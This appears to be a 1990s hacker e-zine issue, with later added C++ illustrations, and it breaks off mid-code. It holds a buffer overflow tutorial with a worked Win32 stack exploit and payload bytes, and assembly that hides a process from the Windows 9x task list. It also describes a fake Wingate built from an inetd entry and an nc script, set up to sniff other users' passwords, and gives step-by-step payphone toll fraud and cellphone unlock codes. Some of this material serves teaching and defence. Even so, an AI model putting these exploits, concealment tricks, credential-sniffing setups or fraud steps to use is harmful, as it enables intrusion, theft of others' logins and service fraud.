1. Access to computers-and anything which might teach you something
about the way the world works-should be unlimited and total.
Always yield to the Hands-On imperative!
2. All information should be free.
3. Mistrust Authority-Promote Decentralization.
4. Hackers should be judged by their hacking, not bogus criteria such
as degrees, age, race, or position.
5. You can create art and beauty on a computer.
6. Computers can change (your) life for the better.
The 1980s code of ethics. A new one, based on newer ideas, supposedly appeared in the 90s, but I prefer the 80s version, because it is free.
.-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-.
Principles of Buffer Overflow explained by Jus
.-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-.
This article is an attempt to quickly and simply explain everyone's favourite
manner of exploiting daemons - The Buffer Overflow.
- Huh? -
The remote buffer overflow is a very commonly found and exploited bug in badly
coded daemons - by overflowing a buffer on the stack one can make the software
execute a shell with the daemon's current UID - thus if the daemon runs as
root, as many do, a root shell will be spawned, giving full remote access.
A buffer is a block of computer memory that holds many instances of the same
data type - an array. Buffers can be static or automatic: a static buffer is
allocated once when the program is loaded, an automatic buffer is allocated on
the stack at run time each time its function is entered (a third kind, the
heap buffer obtained from malloc(), is not covered here). We will be looking
at automatic, or stack-based, buffers and at overflowing them - filling them
up over the top, or breaking their boundaries.
A stack is a collection of objects placed one on top of the other, where the
last object placed on the stack is the first one to be removed. This is called
LIFO - last in, first out (a queue, by contrast, is first in, first out). An
element can be added to the stack (PUSH) and removed from it (POP). A stack is
made up of stack frames, which are pushed when a function is called and popped
when it returns; each frame holds the function's arguments, the saved return
address, the caller's saved frame pointer and the function's local variables,
including any automatic buffers.
The stack pointer (SP) always points to the top of the stack; the bottom of it
is fixed. PUSH and POP operations change the size of the stack dynamically at
run time, and it grows either down the memory addresses (as on x86) or up
them. This means that one could address variables in the stack by giving
their offsets from SP, but as POPs and PUSHes occur these offsets change
around. Another pointer, the frame pointer (FP - EBP on x86), points to a
fixed location within a frame. This can be used for referencing variables
because their distances from the FP do not change.
- The Overflow -
A buffer overflow is what happens when more data is written into a buffer than
it was sized to hold. Because the buffer lives inside the stack frame, the
excess does not get "pushed out" anywhere - it simply overwrites whatever sits
next to the buffer in memory: other local variables, the saved frame pointer
and, most usefully, the saved return address of the function. We use this to
change the flow of execution of the program - hopefully by executing code of
our choice, normally just to spawn a shell.
By filling the buffer up with shellcode, designed to spawn a shell on the
remote machine, and overwriting the return address so that it points back
into the buffer, we make the function "return" into the shellcode, and the
program runs it.
This is just a simplified version of what actually happens during a buffer
overflow - there is more to it, but the basics are essential to understand if
you want to win an argument one day.
-jus (jus@security.za.net)
[ Epilogue by Wyzewun:
Time for a practical example. I did this some time ago on my Dad's Windoze box
to explain it to myself: I had downloaded a file on Win32 buffer overflows but
I really didn't feel like reading, so I figured it out myself instead. It took
me +-20 mins to do the whole thing, but at least I was keeping a log of me
trying to get it right so I can just paste it more or less unchanged here -
save, of course, for the explanations. Next time I'll get human and actually
READ UP on whatever I'm trying to do before I try DO it so I don't waste so
much damn time. :/ Anyway, here's the notes...
#include <iostream>   // the original used the pre-standard <iostream.h>
#include <cstring>    // strcpy()
using namespace std;

int main() {
    char buffer[40];
    char buffer2[20];        // This doesn't need to be smaller though
    cout << "Gimmee a variable\n";
    cin >> buffer;           // no bound: reads until whitespace, even past 40 bytes
    strcpy(buffer2, buffer); // no bound: copies whatever buffer holds into 20 bytes
    return 666;
}
Because strcpy() has no bounds checking, there is an obvious buffer overflow
vulnerability here...
c:\>overflow
Gimmee a variable
12345678901234567890
It executed fine. Now let's try...
c:\>overflow
Gimmee a variable
123456789012345678901
At this point Windoze cuts in with the following...
OVERFLOW caused an invalid page fault in module OVERFLOW.EXE at 015f:00402127.
Registers:
EAX=0000029a CS=015f EIP=00402127 EFLGS=00000206
EBX=00530000 SS=0167 ESP=0063fe0c EBP=00630031
ECX=0063fdd4 DS=0167 ESI=81596754 FS=1157
EDX=00400031 ES=0167 EDI=00000000 GS=0000
Bytes at CS:EIP:
89 45 e4 50 e8 12 15 00 00 8b 45 ec 8b 08 8b 09
Stack dump:
00000000 81596754 00530000 c0000005 0063ff68 0063fe0c 0063fc3c 0063ff68
00403d18 00407190 00000000 0063ff78 bff8b537 00000000 81596754 00530000
Is this a buffer overflow bug or is this something else we are mistaking for
one? Well, let's check, we feed it a good 30 "a" characters and we look at the
values of the registers when it dies....
Registers:
EAX=0000029a CS=015f EIP=61616161 EFLGS=00000202
EBX=00530000 SS=0167 ESP=0063fe00 EBP=61616161
ECX=0063fddc DS=0167 ESI=81596628 FS=117f
EDX=00006161 ES=0167 EDI=00000000 GS=0000
Aaah, see that? EIP is 61616161 - 61 being the hex value of the "a" character,
so it's overflowing all right. Now let's exploit it. :) First off, we add the
following line to the example C++ proggy above...
cout << &buffer2 << "\n";
And when executing the program, the output we get is as follows...
0x0063FDE4
Gimmee a variable
Right, so buffer2's address is 0x0063FDE4 - and just in case that's a bit off
for some reason - we'll pad it a bit.
Padding? Right. Executing the NOP instruction (0x90), which most CPUs have -
just something to do nothing. That way, hopefully, when we overwrite the return
address we land somewhere in the middle of the NOPs, and then just execute
along until we get to our shellcode. Errr, I'm not being clear; what I mean is
the buffer will look like: [NOPNOPNOPNOP] [SHELLCODE] [NOPNOPNOPNOP] [RET]
Shellcode? Right. We can execute pretty much anything we want, and as much as
I would like to have interesting shellcode, I don't have the tools to make
some on this PC, and I *really* don't feel like going online to rip somebody
else's. And so, my choice in shellcode - int 20h - program termination. :)
Right!!! So our shellcode is 2 characters, and we can feed the program 24
characters before we start overwriting the return address, so lets have 11 NOP
characters on either side of our shellcode just to make it pretty and even
looking. Let's try this out...
c:\>overflow
Gimmee a variable
[raw bytes typed here: 90 90 90 90 90 90 90 90 90 90 90 CD 20 90 90 90 90 90 90 90 90 90 90 90 63 FD E4]
c:\>
Heeey, I gave it too many characters and it didn't crash. It worked. :) That
string in hex would be 9090909090909090909090CD20909090909090909090909063FDE4,
the CD20 in the middle being interrupt 20h, and the 63FDE4 being the address
of the buffer we're overflowing, which we are setting as the return address,
namely 0x0063FDE4. Hopefully you're beginning to see the idea here. If you
would like to play around with my example file some more, I included the
binary in the general-junk directory of this issue. Have fun! ]
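As an added illustration (not part of the zine and not Wyzewun's binary), the C++ below models the frame layout his log implies - 20 bytes of buffer2, then the saved EBP, then the return address 24 bytes in - as a plain struct, so the overwrite can be replayed deterministically without crashing anything. It feeds the struct the inputs from the log (20 digits, 21 digits, 30 a's) and the NOP / int 20h / NOP / address payload through an unchecked copy, and puts the bounds-checked copy beside it. The initial EBP and return values are constructed stand-ins, and the payload stores the 32-bit address low byte first, which is how a 32-bit x86 keeps a dword in memory.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <iostream>

// Illustrative model of the frame layout the Win32 log implies: 20 bytes of
// buffer2, then the caller's saved EBP, then the saved return address, so the
// return address is reached after 24 bytes. A real compiler frame may put
// other locals, padding or a stack cookie in between; this struct only pins
// the layout so the demonstration is deterministic.
struct Frame {
    char          buffer2[20];
    std::uint32_t saved_ebp;
    std::uint32_t ret;
};
static_assert(offsetof(Frame, ret) == 24, "return address sits 24 bytes in");

// The unchecked write (strcpy() or "cin >> buffer2"): copies every byte it is
// handed, starting at buffer2, however many there are. The copy is clamped to
// the struct so the demo stays inside one object; on a real stack it would
// simply carry on past the end of the frame.
static void uncheckedWrite(Frame& f, const unsigned char* in, std::size_t len) {
    if (len > sizeof f) len = sizeof f;
    std::memcpy(reinterpret_cast<unsigned char*>(&f), in, len);
}

// Hardened form: refuse the copy unless the string and its NUL both fit.
static bool checkedWrite(Frame& f, const char* in) {
    const std::size_t n = std::strlen(in);
    if (n >= sizeof f.buffer2) return false;   // 20 chars need 21 bytes: reject
    std::memcpy(f.buffer2, in, n + 1);
    return true;
}

static bool checkedCopyAccepts(const char* s) {
    Frame f{};
    return checkedWrite(f, s);
}

// Constructed "legitimate" frame contents, then a strcpy()-style copy of s
// (its bytes plus the terminator). Returns the frame so the damage can be seen.
static Frame frameAfterStrcpy(const char* s) {
    Frame f{};
    f.saved_ebp = 0x0063FF68u;   // constructed stand-in for the caller's EBP
    f.ret       = 0x00402127u;   // constructed stand-in for the real return address
    uncheckedWrite(f, reinterpret_cast<const unsigned char*>(s), std::strlen(s) + 1);
    return f;
}

// Payload shape from the epilogue: NOP sled, the two-byte "int 20h", NOP sled
// up to the return-address slot, then the chosen address stored low byte
// first (little-endian), which is how a 32-bit x86 keeps a dword in memory.
static std::size_t buildPayload(unsigned char* out, std::size_t cap, std::uint32_t retAddr) {
    static const unsigned char shellcode[] = { 0xCD, 0x20 };
    const std::size_t retOffset = offsetof(Frame, ret);
    const std::size_t sled = (retOffset - sizeof shellcode) / 2;   // 11 NOPs each side
    if (cap < retOffset + sizeof retAddr) return 0;
    std::size_t pos = 0;
    std::memset(out + pos, 0x90, sled);                  pos += sled;
    std::memcpy(out + pos, shellcode, sizeof shellcode); pos += sizeof shellcode;
    std::memset(out + pos, 0x90, sled);                  pos += sled;
    for (int i = 0; i < 4; ++i)
        out[pos++] = static_cast<unsigned char>(retAddr >> (8 * i));
    return pos;                                          // 28 bytes
}

// Feeds the payload through the unchecked copy and reports where the
// function would now "return" to.
static std::uint32_t returnAddressAfterPayload(std::uint32_t retAddr) {
    unsigned char payload[64];
    const std::size_t n = buildPayload(payload, sizeof payload, retAddr);
    Frame f = frameAfterStrcpy("");
    uncheckedWrite(f, payload, n);
    return f.ret;
}

int main() {
    std::cout << std::hex << std::showbase;
    std::cout << "EBP after 20 digits: " << frameAfterStrcpy("12345678901234567890").saved_ebp << '\n';
    std::cout << "EBP after 21 digits: " << frameAfterStrcpy("123456789012345678901").saved_ebp << '\n';
    std::cout << "EIP after 30 a's:    " << frameAfterStrcpy("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa").ret << '\n';
    std::cout << "EIP after payload:   " << returnAddressAfterPayload(0x0063FDE4u) << '\n';
    std::cout << std::boolalpha << "checked copy of 20 digits accepted: "
              << checkedCopyAccepts("12345678901234567890") << '\n';
    return 0;
}
```

The 21-digit run leaves the saved EBP as 0x00630031, the value in the register dump above: the trailing '1' and the NUL of the over-long string land in its low two bytes. With 20 digits only the NUL lands there, which is why that run "executed fine" even though it had already overflowed by one byte.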
/// addition.
Amendment to FK8 by Wyzewun - Released 27th December, 1999
Every single file available on buffer overflows mentions that strcpy(),
strcat(), sprintf(), vsprintf(), gets() and loops using getc(), fgetc() and
getchar() are problematic, but for some reason no-one has noticed that 'cin >>'
into a char array is also a problem. So yeh, the demonstration overflow code we
featured in FK8 has *two* vulnerabilities, and we were exploiting the one we
didn't know existed: it just happened to still work because of the padding,
heh. ;-P
Anyway, cin is *extremely* commonly used in C++ code, and it ought to be more
widely known that the favoured use of it - 'cin >> buffer' with buffer a
fixed-size char array - is insecure: the extraction stops at whitespace, not at
the end of the array. Ditto for improper use of an ifstream. If you insist on
using iostream.h (cin and ifstream) then use get() and getline() instead of the
'>>' system, and give them the size of the array so the read is bounded;
alternatively set a width with setw() before the '>>'.
Also, some newbies may have been confused by my comment about the buffer2
array which makes no sense. What I *meant* to say (but which got lost due to
general braindeadness at the time of writing) is that buffer2 needn't be so
much smaller than buffer1: even a single byte is enough.
Oh, and as a final correction - Pneuma's addy is satur9@punkass.com and not
the one specified in the zine. :) Right, just a small update, but a necessary
one. And watch out for FK9, coming your way in February or March 2000!
Cheers,
Wyzewun
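An added example, not from FK8, of the bounded reads the amendment recommends. The arrays are passed by reference so their size is known to the function, setw() puts a bound on the '>>' extraction, and the getline() wrapper recovers the stream after an over-long line instead of leaving failbit set for every later read. Input comes from a std::istringstream standing in for cin so the behaviour can be checked offline; the 20-byte array mirrors buffer2 in the listing.

```cpp
#include <cstring>
#include <iomanip>
#include <iostream>
#include <limits>
#include <sstream>
#include <string>

// The unsafe idiom is "cin >> buffer" with buffer a fixed-size char array:
// extraction stops at whitespace, not at the end of the array. Taking the
// array by reference keeps its size N with it, and setw(N) tells operator>>
// to store at most N-1 characters plus the NUL. Returns the number stored.
template <std::size_t N>
static std::size_t boundedExtract(std::istream& in, char (&buf)[N]) {
    buf[0] = '\0';
    in >> std::setw(static_cast<int>(N)) >> buf;   // the width applies to this one extraction
    return std::strlen(buf);
}

// Line-oriented form with getline(). N is the bound: an over-long line is cut
// at N-1 characters and failbit is set. Returns false in that case and
// discards the rest of the line so the stream is usable for the next read.
template <std::size_t N>
static bool boundedGetline(std::istream& in, char (&buf)[N]) {
    in.getline(buf, static_cast<std::streamsize>(N));
    if (!in.fail()) return true;              // whole line fitted (or clean EOF)
    if (in.eof()) return false;               // nothing was left to read
    in.clear();                               // drop the failbit left by truncation
    in.ignore(std::numeric_limits<std::streamsize>::max(), '\n');
    return false;
}

// Helpers over constructed input so the behaviour can be checked without a
// terminal. The 20-byte array mirrors buffer2 in the original listing.
static std::size_t extractedLength(const std::string& input) {
    char buf[20];
    std::istringstream in(input);             // stand-in for cin
    return boundedExtract(in, buf);
}

static bool lineFits(const std::string& input) {
    char buf[20];
    std::istringstream in(input);
    return boundedGetline(in, buf);
}

// Reads two lines and returns the second, to show that a truncated first
// line does not poison the reads that follow it.
static std::string secondLine(const std::string& input) {
    char buf[20];
    std::istringstream in(input);
    boundedGetline(in, buf);
    if (!boundedGetline(in, buf)) return std::string();
    return std::string(buf);
}

int main() {
    std::cout << "21 digits via setw(20): " << extractedLength("123456789012345678901")
              << " chars stored\n";
    std::cout << std::boolalpha << "30 a's fit on one getline? "
              << lineFits("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\n") << '\n';
    std::cout << "second line after a truncated first: "
              << secondLine("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\nshort\n") << '\n';
    return 0;
}
```

With a std::string instead of a char array, 'cin >> s' grows the string to fit and the bound problem disappears; the wrappers above are for code that has to keep the C array.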
.-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-.
Introduction to Assembly Programming by Moe1
.-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-.
This will cover how to write your first program in assembly using DEBUG.COM as
shipped with Windows 9x and MS-DOS...
C:\party2k>debug
- a100
0C1B:0100 jmp 125
(Jumps to address 125h, over the string data that follows)
0C1B:0102 [Enter]
- e 102 'Happy Birthday FK!!!' 0d 0a '$'
[ In function 09 of Int 21, as with most functions of int 21, the string is
terminated with a "$" character. - Ed]
- a125
0C1B:0125 MOV DX,0102
(Copies the string's offset, 0102, into DX) [DOS function 09 reads the address
of the string from DS:DX; in a .COM program DS already equals CS, so only the
offset has to be loaded. - Ed]
0C1B:0128 MOV CX,000F
(Number of times the string will be displayed: 0Fh = 15)
0C1B:012B MOV AH,09
(Copies 09 value to AH register) [09 is the function for MS-DOS to call - Ed]
0C1B:012D INT 21
(Displays string) [int 21h is the MS-DOS function call interrupt - Ed]
0C1B:012F DEC CX
(Decrements CX by 1)
0C1B:0130 JCXZ 0134
(If CX is equal to 0 jumps to 0134)
0C1B:0132 JMP 012D
(Jumps back to address 012D)
0C1B:0134 INT 20
(Ends the program)
0C1B:0136 [ENTER]
(Now we start compiling our lil codey, awww how kewt;)
- h 0136 0100
(h prints the sum and the difference of its two arguments; the difference,
0036, is the length of the program in bytes)
- n fkrulez.com
- rcx
CX 0000
: 0036
(CX holds the number of bytes that w will write, starting at CS:0100)
- w
Writing 00036 bytes
- q
c:\party2k>fkrulez
Happy Birthday FK!!!
Happy Birthday FK!!!
Happy Birthday FK!!!
Happy Birthday FK!!!
Happy Birthday FK!!!
Happy Birthday FK!!!
Happy Birthday FK!!!
Happy Birthday FK!!!
Happy Birthday FK!!!
Happy Birthday FK!!!
Happy Birthday FK!!!
Happy Birthday FK!!!
Happy Birthday FK!!!
Happy Birthday FK!!!
Happy Birthday FK!!!
So now as another practical example, let's look at how we would hide a program
from Windoze using masm32. To do this we simply pass the program's process ID
to the RegisterService() function thus registering the program as a service,
which wont show up in the windows task list.
.386
.model flat, stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib

.data ; first we define in our data section
szKernel32 db "Kernel32.dll",0
szRSP db "RegisterServiceProcess",0
.code ; now we start the code
start:
    push offset szKernel32
    call GetModuleHandle ; get Kernel32.dll handle
    push offset szRSP
    push eax
    call GetProcAddress ; get function address - resolved at run time because
                        ; RegisterServiceProcess only exists in the Win9x kernel32
    test eax, eax
    jz done             ; not there (e.g. on NT): don't call a null pointer
    mov ebx, eax ; save our pointer into ebx
    call GetCurrentProcessId ; get current process id
    push 1 ; 1 = Register Service, 0 = Unregister Serv.
    push eax ; process id
    call ebx ; call RegisterServiceProcess (stdcall, so it pops its two args)
    ; ... the program's real work goes here; it stays off the task list until it exits
done:
    push 0
    call ExitProcess
end start
We could do this in any language which we can access the Win32 API from
really, I just used assembly as an example because it's what we're playing
with here. :)
[ Some more additions from Wyzewun: And there you have it. If you're
interested in getting involved with Assembly Programming, look around at the
stuff available in the programming tutorials section of Packetstorm Security
and particularly the tutorial available there made by the University of
Guadalajara (don't ask me where that is) which is quite detailed. As you get
better you will find other resources for ASM coding all over the place, so
look around and you shouldn't have much trouble finding what you want. :)
PacketStorm also has some great resources for other programming languages
like C/C++, Pascal, JavaScript, Perl, Python - you name it. :) Mm, no TCL/TK
yet, but I s'pose you can pick that up at other places.
Also, try and see if you can get hold of the SAMS MS-DOS Bible - it's what
I learnt what I know about assembly from and it's a great reference for
DOS/Windoze ASM. Mmm, I'm still using the Second Edition (Covers MS-DOS 3.3)
but I'm sure there are newer versions lying around. Well, I hope. Otherwise
it won't be much use, now will it? :) ]
.-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-.
Fun with "Trojan" Wingates by Wyzewun
.-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-.
Allright, here's a lame little idea for the purpose of abusing hacker kiddies.
Scenario: It's a Sunday afternoon. There is nothing to do. The sun is cooking
your brain and you've hardly the energy to move, let-alone actually do
something that requires an IQ above that of an oyster. What do you do?
Step One
+-====-+
Install a Sniffer on your box. There is a nice collection of sniffers at
ftp.technotronic.com/unix/network-sniffers or alternatively, if you have
friends like Vortexia who are lamer warez kiddies that can leech stuff for
you, have a NT/98 box as your gateway and install Sniffer Pro by Network
Associates on it. It's a seriously kickass proggy - Even though NAI suck. :P
Step Two
+-====-+
Anyway, so for lack of anything better to do, lets go to www.cyberarmy.com and
look at the list of Wingates. Hmmm... Bullshit, Bullshit, Bullshit - Aaah,
here's one that works - lets say - dns.gincorp.co.jp - Right, so now we have
a Wingate. Errr... So What?
Step Three
+-======-+
[drew@kung-fusion]$ cat > phjeeer << seckz
#!/bin/bash
nc dns.gincorp.co.jp 23
echo shj3esh j0or a fuqn tw1t
seckz
[drew@kung-fusion]$ chmod 755 phjeeer
Step Four
+-=====-+
Hmmm. I'm still bored. I know! I think I'll su and edit some random junk into
my /etc/inetd.conf or something...
Before Eliteness...
#telnet stream tcp nowait root /usr/local/libexec/tcpd /usr/libexec/telnetd
After Eliteness...
telnet stream tcp nowait drew /usr/local/libexec/tcpd /home/drew/phjeeer
Now we 'killall -HUP inetd' (SIGHUP makes inetd re-read inetd.conf; a -9 would
just kill it), lose our connection to that lame IRC session which wasn't even
vaguely interesting anyway, and we are now left just as bored as before.
Step Five
+-=====-+
I'm bored. I think I'll telnet into myself...
[drew@kung-fusion]$ telnet leet.bsd.box
Trying 192.168.33.3...
Connected to leet.bsd.box.
Escape character is '^]'.
Wingate>
A Wingate! Fuqn shit du0d! I'm gonna go back to www.cyberarmy.com and add
myself to the Wingate list so peeble can abj00ze me too!@#$%
And then...
+--==--==-+
Within a few hours, our sniffer logs begin to pick up all sorts of interesting
things like usernames and passwords for things people shouldn't be accessing,
lamers making fools of themselves on IRC and all sorts of funny stuff. Aaah,
at last. Entertainment at the expense of the hacker community. Who says we
aren't united, man? I *Love* these guys...
But Remember...
+--==--==--==-+
This can be dangerous and if you don't select the Wingate to abuse carefully
you may end up getting yourself in more trouble than you bargained for. Don't
be stupid. :)
Various Phone Warez from MercEnarY
First off, let's cover phreaking the Telkom tetabox phones. Note: not the big
blue ones, those small ones you find in some places [Wyzewun: He's referring
to Telkom's Chatterbox range. You'll recognise it because it says "Chatterbox"
on it - imagine that :P]
This technique was picked up by me when trying to phone people in Johannesburg
when I was at boarding school, and lets you use a Telkom coin phone to phone
for free (not exactly free, because the line still gets charged, just not
you)...
1) You need access to the plug-in point of the phone (some of the older phones
have a point where the jack can be attached to the phone; in the newer ones
the jack is already attached, so you need to find the point where the jack
goes into the wall instead).
2) Now dial '080' and wait for the fast engaged signal [Wyzewun: number
unobtainable tone].
3) When you have the signal, quickly take the jack out of the connection point
and put it back in. Check that the phone has a dialling tone and that 080 is
still shown on the LCD screen. If there is no dialling tone you have moved
the line in and out too fast; if the 080 is not shown on the screen you have
moved the line too slowly.
4) Now the phone has 080 on the screen and you can dial the number you want.
Also note that if you want to dial a local number you must enter the area
code.
Theory behind this: the phone is led to believe that you are dialling a 080
(toll-free) number.
Wondering: if you cut a phone line coming out of a normal payphone and
connected it so that you have a point where you can connect and disconnect as
you please, would this work? [Wyzewun: Yeh]
---
Now for how to get the master code for unlocking cellphones...
The code is a combination of the SP code (5 digits) and the phone's IMEI (15
digits); use mc1.exe and mc2.exe to get the code.
To view the IMEI of the Cell, press: *#06#
Check,Activate or Remove card restrictions
#pw+XXXXXXXXXX+1# - Provider-Lock status
#pw+XXXXXXXXXX+2# - Network-Lock status
#pw+XXXXXXXXXX+3# - Provider(???)-Lock status
#pw+XXXXXXXXXX+4# - SimCard-Lock status
XXXXXXXXXX (master code) is a 10 digit code, based on the IMEI number of your
phone. Press * repeatedly to get the "p" and "w" characters.
Service Provider Codes
MTN = 655 10
Vodacom = 655 01
---
Now let's play around a bit with Net Monitor on your cellphone (works with
Nokia 51xx and 61xx, maybe 3210).
Net Monitor is an extended menu on Nokia phones; it appears as an additional
menu on your Nokia 5110 once you enable it. To enable Net Monitor over an FBUS
cable you need the DOS software PCLocals V1.3.
The Network Monitor gives you the following information:
Carrier number
MS RX level in dBm
Received signal quality
MS TX power level
C1 (path loss criterion, used for cell selection and reselection). The range
is -99 to 99
RLT (Radio Link timeout)
Timeslot
Indication of the transmitter status
Information on the network parameters
TMSI (temporary Mobile Subscriber Identity)
Cell Identification (CELL ID, number of the cell being used)
MCC (Mobile Country Code)
MNC (Mobile Network Code)
LAC (location Area Code)
Ciphering (on/off)
Hopping (on/off)
DTX (on/off)
Discarding cell barred information
Here is a 10 step description for enabling the net monitor (field test
display) using PCLocals:
1) Make sure to start PCLocals in plain DOS.
2) First don't connect the phone; start the program and ignore the error
message.
3) Configure the cable type and COM port (the hardware COM port, not a virtual
COM port like the one the data suite uses).
4) Save the settings and quit the program.
5) Connect the phone with the cable and start the program.
6) The phone "boots" as you enter the main menu and all options become
available (all menus are white coloured).
7) Choose menu 3 (ME Memory Functions).
8) Choose menu 6 (Field Test Display Settings).
9) Now you have the following options:
   Enter 243 to activate the "big" net monitor (menus 01 to 89, including
   menus 01 to 19).
   Enter 242 to activate the "small" net monitor (menus 01 to 19).
   Enter 241 to deactivate the net monitor.
   Enter 240 to reset timers (?).
   Don't forget to confirm your selection by hitting Enter (you won't see any
   reaction, but it's necessary).
10) Quit the program; the phone "boots" and you can enjoy the net monitor.
All following actions are done on the phone.
Go to the Net Monitor menu and at the test prompt enter 241 to deactivate the
net monitor completely. Further, you can change from the big net monitor to
the small net monitor by entering 242 at the test prompt (if the Net Monitor
menu is still available). Note: after that you can't change back to the big
net monitor!!
Note: if you can't find PCLocals use net_monitor.exe; I don't know whether it
gives the big or the small menu.
MercEnarY sends greetz to: Depach, ReaXioN, BillaBong and IleK
All comments should be mailed to MercEnarY at mercenary@sylicon.org
SAIX Dynamic IP System explained by Moe1, Virulent and Jumpers
ndf53-01-p01.gt.saix.net
[dialup server code]-[subnet unit]-[port assigned].[province].saix.net
Province Info
-------------
*.ec.saix.net = Eastern Cape
*.fs.saix.net = Free State
*.gt.saix.net = Gauteng
*.kn.saix.net = Kwazulu Natal
*.nt.saix.net = Northern Transvaal
*.wc.saix.net = Western Cape
Dialup server codes
-------------------
bfn53 - | bfn53-01.fs.saix.net | Bloemfontein dial up
bfw25 - | bfw25-01.saix.net | Beaufort West dial up
blm53 - | blm53-01-23.fs.saix.net | Bethlehem dial up
bso36 - | bso36-01.ec.saix.net | Bisho dial up
cbs53 - | cbs53-01.wc.saix.net | Cape town dial up
cis25 - | cis25-01.wc.saix.net | Christiana dial up
cn53 - | cn53-01.wc.saix.net | Riversdale dial up
ctb53 - | ctb53-01.wc.saix.net | Bellville dial up
dps53 - | dps53-01.kn.saix.net | Durban dial up
el25 - | el25-01.ec.saix.net | East London dial up
epi53 - | epi53-01.kn.saix.net | Empangeni dial up
gfr25 - | gfr25-01-s1.saix.net | Graaff-Reinet dial up
gw53 - | gw53-01.ec.saix.net | George dial up
hwh53 - | hwh53-01.gt.saix.net | Halfway House dial up
kby53 - | kby53-01-.fs.saix.net | Kimberley dial up
kdp53 - | kdp53-01.gt.saix.net | Krugersdorp dial up
kp53 - | kp53-01.nt.saix.net | Klerksdorp dial up
kmp53 - | kmp53-01.gt.saix.net | Kempton Park dial up
kvn53 - | kvn53-01.gt.saix.net | Kelvinia dial up
lt53 - | lt53-01-01.nt.saix.net | Louis Trichardt dial up
lys53 - | lys53-01.kn.saix.net | Ladysmith dial up
npt53 - | npt53-01.nt.saix.net | Nelspruit dial up
pc36 - | pc36-01.nt.saix.net | Potchefstroom dial up
pgb53 - | pgb53-01.nt.saix.net | Pietersburg dial up
pmb53 - | pmb53-01.kn.saix.net | Pietermaritzburg dial up
ppr53 - | ppr53-01.nt.saix.net | Pretoria dial up
pss36 - | pss36-01.kn.saix.net | Port Shepstone dial up
psw53 - | psw53-01.ec.saix.net | Port Elizabeth dial up
qn25 - | qn25-01.saix.net | Queenstown dial up
rsb53 - | rsb53-01.gt.saix.net | Rosebank dial up
rst36 - | rst36-01.nt.saix.net | Rustenburg dial up
sca53 - | sca53-01.nt.saix.net | *
swm25 - | swm25-01.saix.net | Swellendam dial up
ndf53 - | ndf53-01.gt.saix.net | Newdoornfontein dial up
npt25 - | npt25-01.saix.net | Nelspruit dial up
ns53 - | ns53-01.nt.saix.net | Nylstroom dial up
nwc36 - | nwc23-01.kn.saix.net | Newcastle dial up
md25 - | md25-01.saix.net | Middelburg (Cape) dial up
md53 - | md53-01.gt.saix.net | Middelburg (Tvl) dial up
mmb25 - | mmb25-01.saix.net | Mmabathu dial up
mmb53 - | mmb53-01.nt.saix.net | Mmabathu dial up
my53 - | my53-01.wc.saix.net | Malmesbury dial up
ue53 - | ue53-01.ec.saix.net | Uitenhage dial up
uta36 - | uta36-01.ec.saix.net | Umtata dial up
up53 - | up53-01.fs.saix.net | Upington dial up
vdd53 - | vdd53-01.wc.saix.net | Vredendal dial up
ver53 - | ver53-01.nt.saix.net | Vereeniging dial up
vkr25 - | vkr25-01.saix.net | Volksrust dial up
wkm53 - | wkm53-01.fs.saix.net | Welkom dial up
wtk53 - | wtk53-01.gt.saix.net | *
woc36 - | woc36-01.wc.saix.net | Worcester dial up
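An added example (not from the zine): a parser for the name format described above, so a reverse-DNS name pulled from a log can be reduced to dialup server code, subnet unit, port and province. Port and province are optional because several entries in the table lack them. The province map is the one given above; the sample names are taken from the table, plus one constructed look-alike that must be rejected.

```cpp
#include <iostream>
#include <map>
#include <regex>
#include <string>

// One parsed reverse-DNS name of the form
//   [dialup server code]-[subnet unit]-[port assigned].[province].saix.net
// Port and province are optional: the table lists names such as
// bfn53-01.fs.saix.net (no port) and bfw25-01.saix.net (no province).
struct SaixHost {
    bool ok = false;
    std::string server;    // e.g. "ndf53"
    std::string unit;      // e.g. "01"
    std::string port;      // e.g. "p01", "s1", "23"; empty when absent
    std::string province;  // e.g. "gt"; empty when absent
};

// Province codes as listed in the article.
static const std::map<std::string, std::string> kProvinces = {
    {"ec", "Eastern Cape"},  {"fs", "Free State"},         {"gt", "Gauteng"},
    {"kn", "Kwazulu Natal"}, {"nt", "Northern Transvaal"}, {"wc", "Western Cape"},
};

static SaixHost parseSaixHost(const std::string& host) {
    // Anchored at both ends so a constructed look-alike such as
    // "ndf53-01.gt.saix.net.attacker.example" does not match.
    static const std::regex re(
        R"(^([a-z]+[0-9]+)-([0-9]+)(?:-([a-z]?[0-9]+))?(?:\.([a-z]{2}))?\.saix\.net$)");
    SaixHost h;
    std::smatch m;
    if (!std::regex_match(host, m, re)) return h;
    h.ok = true;
    h.server   = m[1].str();
    h.unit     = m[2].str();
    h.port     = m[3].str();   // empty string when the group did not take part
    h.province = m[4].str();
    return h;
}

// Human-readable province for a name, or the reason none could be given.
static std::string provinceOf(const std::string& host) {
    const SaixHost h = parseSaixHost(host);
    if (!h.ok) return "not a SAIX dialup name";
    if (h.province.empty()) return "no province in name";
    const auto it = kProvinces.find(h.province);
    return it == kProvinces.end() ? "unknown province code " + h.province : it->second;
}

// "server/unit/port" for a log line; empty when the name is not a SAIX one.
static std::string dialupPort(const std::string& host) {
    const SaixHost h = parseSaixHost(host);
    if (!h.ok) return std::string();
    return h.server + "/" + h.unit + (h.port.empty() ? "" : "/" + h.port);
}

int main() {
    const char* samples[] = {
        "ndf53-01-p01.gt.saix.net", "bfw25-01.saix.net", "gfr25-01-s1.saix.net",
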